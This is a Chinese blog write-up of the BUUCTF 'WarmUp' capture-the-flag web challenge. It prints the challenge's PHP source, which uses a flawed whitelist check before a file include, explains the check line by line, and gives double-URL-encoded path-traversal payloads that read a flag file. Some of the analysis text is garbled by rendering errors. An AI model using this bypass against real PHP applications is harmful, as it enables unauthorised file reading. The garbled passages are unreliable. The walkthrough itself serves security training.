BUUCTF-warmup

最新推荐文章于 2024-08-04 14:47:29 发布
最新推荐文章于 2024-08-04 14:47:29 发布
阅读量792 收藏 9
点赞数 19
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70405138/article/details/138956832
版权

一、打开题目除了一张图片什么也没有,F12看看

二、发现source.php

三、查看source.php代码

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {# 判断page变量是否为空,是否是字符串
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {# 判断传入的page是否在白名单中
                return true;
            }

            $_page = mb_substr( # 截取page?之前的字符赋给_page
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {#判断_page是否在白名单中
                return true;
            }

            $_page = urldecode($page);#对page进行URL解码并赋给_page,
            $_page = mb_substr( # 截取_page?之前的字符赋给_page
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) { # 判断处理后的_page在不在白名单中,因此需传入二次编码后的内容,就可以使checkfile为true.
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])  #判断传入的file不能为空
        && is_string($_REQUEST['file'])#并且是字符串
        && emmm::checkFile($_REQUEST['file'])# checkfile为true
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

四、查看hint.php

/hint.php的内容:flag not here, and flag in ffffllllaaaagggg

五、分析source.php代码

if (! empty(KaTeX parse error: Expected 'EOF', got '#' at position 20: …UEST['file']) #̲#不能为空 &…_REQUEST[‘file’]) ##是字符串
&& emmm::checkFile($_REQUEST[‘file’]) ##上面checkfile返回为true
) {
include $_REQUEST[‘file’];
exit;
} else {
echo “
<img src=“https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg” />”;
}

  • 1.判断传入的file不能为空
  • 2.并且是字符串
  • 3.checkFile()返回true

满足以上三点才可包含文件

分析 checkfile()函数(重点,核心)
首先是设置了个白名单
第一个if,判断page变量是否为空,是否是字符串
第二个if,判断传入的page是否在白名单中
第三个if,截取page ?之前的字符赋给_page,判断_page是否在白名单中
第四个if,对page进行一次url解码并赋给_page,截取_page ?之前的字符赋给_page,判断_page是否在白名单中,因此需传入二次编码后的内容,就可以使checkfile返回true。

两种payload的情况:

      不满足第一个if,满足第三个if
      不满足第一个if,满足第三个if
传入?file=hint.php%253f…/…/…/…/…/…/…/…/ffffllllaaaagggg,因为服务器会自动解一次码,所以p a g e 的 值 为 h i n t . p h p page的值为hint.php%3f../../../../../../../../ffffllllaaaagggg,又一次url解码后,page的值为hint.php_page的值为hint.php?../…/…/…/…/…/…/…/ffffllllaaaagggg,然后截取问号前面的hint.php判断在白名单里返回true。

满足第二个if即为?file=source.php,? file=hint.php,即访问source.php,hint.php的情况

代码分析详见注释

构造payload分析

两种payload的情况:

payload:
file=hint.php?/../../../../../../../../ffffllllaaaagggg(第一种payload情况) file=hint.php%253f/../../../../../../../../ffffllllaaaagggg

五、得flag

.erh
关注
  • 19
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pytorch-gradual-warmup-lr:PyTorch的逐步预热学习速率调度程序
02-05
$ pip install git+https://github.com/ildoonet/pytorch-gradual-warmup-lr.git 用法 请参阅文件。 import torch from torch . optim . lr_scheduler import StepLR , ExponentialLR from torch . optim . sgd ...
TICs-WarmUp
03-29
项目通过GitHub克隆获取,仓库名为"TICs-WarmUp",提供了实践操作的代码示例。下面将详细解释这个教程的主要内容和相关知识点。 首先,克隆仓库是软件开发中的常见操作,用于获取远程存储库的本地副本。在本案例中...
BUUCTF-WarmUp
硫酸超的博客
11-20 5108
BUUCTF-WarmUp(代码审计) 1、打开靶场后,查看源码即可看到 <!--source.php--> 2、进入sourcep.php 代码如下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.ph
buuctf-warmup
qq_56558594的博客
12-10 144
打开靶机,网页上显示一个笑脸,右击查看源码,源码中有个提示 直接访问source.php,爆出了一大串代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.ph
BUUCTF-WarmUp 1
z1moq的博客
09-06 411
根据提示,本题主要是以php代码审计为主 开启靶机后进入靶机 发现什么都没有 打开源码 发现注释中有一个提示,打开提示所在页面 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
buuctf-WarmUp
m0_62094846的博客
03-23 149
查看源代码,看到source.php 先看这段 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br&g..
Buuctf-warmup【代码审计】
qq_61968245的博客
12-15 1059
0x01 题目链接 https://buuoj.cn/challenges#[HCTF%202018]WarmUphttps://buuoj.cn/challenges#[HCTF%202018]WarmUp 0x02 知识点 isset($name):判断变量是否存在 is_string($name):判断变量是否为字符串 in_array($search,$array):判$search是否在$array数组里 mb_stro...
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
weixin_58410275的博客
04-23 1005
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 391
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
BUUCTF-Warmup
keaidxxn的博客
01-03 167
首先看到初始页面,查看下元素: 发现有一个source.php的注释,试着访问下: 这段代码可以去看下大佬的解释:大佬博客 之后我们访问下hint.php: 发现这里提示了一个ffffllllaaaagggg,结合之前的source.php里的代码,由此可知这是一个文件包含,于是构造下url: http://bd518e83-a15c-4d8f-87f6-9b7518657926.node3.buuoj.cn/source.php?file=hint.php?/../../../../../ffffl
buuctf--pwn-warmup
weixin_45427676的博客
09-19 496
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
Proyecto-Warmup
03-18
标题“Proyecto-Warmup”很可能是一个Java项目的名字,它可能是为了热身或者初始化某个复杂的开发任务而设计的。在Java编程中,"Warmup"通常指的是预热过程,这可能涉及到启动应用、加载必要的数据结构或进行性能...
composer-warmup
05-27
OpCode Warmer(composer插件) 通过预热OpCode优化您的应用... recommendedopcache.file_update_protection =0用法$ cd my-project$ composer warmup-opcode它是如何工作的? 从PHP 7.0开始,OpCache扩展能够将编译
react-warmup
03-25
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
web安全基础学习
m0_71332744的博客
07-31 362
记录学习的原理,少有实操持续更新
蓝屏事件:网络安全的启示
最新发布
m0_67187271的博客
08-04 751
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1691
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
子非渔
07-25 920
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
解释代码:def adjust_learning_rate(optimizer, current_epoch, max_epoch, lr_min=0, lr_max=1e-3, warmup=True): warmup_epoch = 10 if warmup else 0 if current_epoch < warmup_epoch: lr = lr_max * current_epoch / warmup_epoch else: lr = lr_min + (lr_max-lr_min)*(1 + math.cos(math.pi * (current_epoch - warmup_epoch) / (max_epoch - warmup_epoch))) / 2 for param_group in optimizer.param_groups: param_group['lr'] = lr
03-27
这段代码是一个用于动态调整学习率的函数,主要包含以下参数: - optimizer:优化器对象,用于更新模型参数。 - current_epoch:当前训练的轮数。 - max_epoch:总的训练轮数。 - lr_min:学习率下限。 - lr_max:学习率上限。 - warmup:是否启用学习率预热。 函数首先根据 warmup 参数决定是否启用学习率预热,将预热轮数设为 10。如果当前轮数小于预热轮数,则学习率 lr 会从 lr_min 逐渐增加到 lr_max,以避免模型在训练初期过度拟合。如果当前轮数大于等于预热轮数,则学习率 lr 会根据 max_epoch 和当前轮数计算出一个介于 lr_min 和 lr_max 之间的值,这个值会随着训练轮数的增加而逐渐减小,以使模型更加稳定。 最后,函数会遍历优化器的所有参数组,将学习率 lr 赋值给每个参数组的 lr 参数,以更新模型参数。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值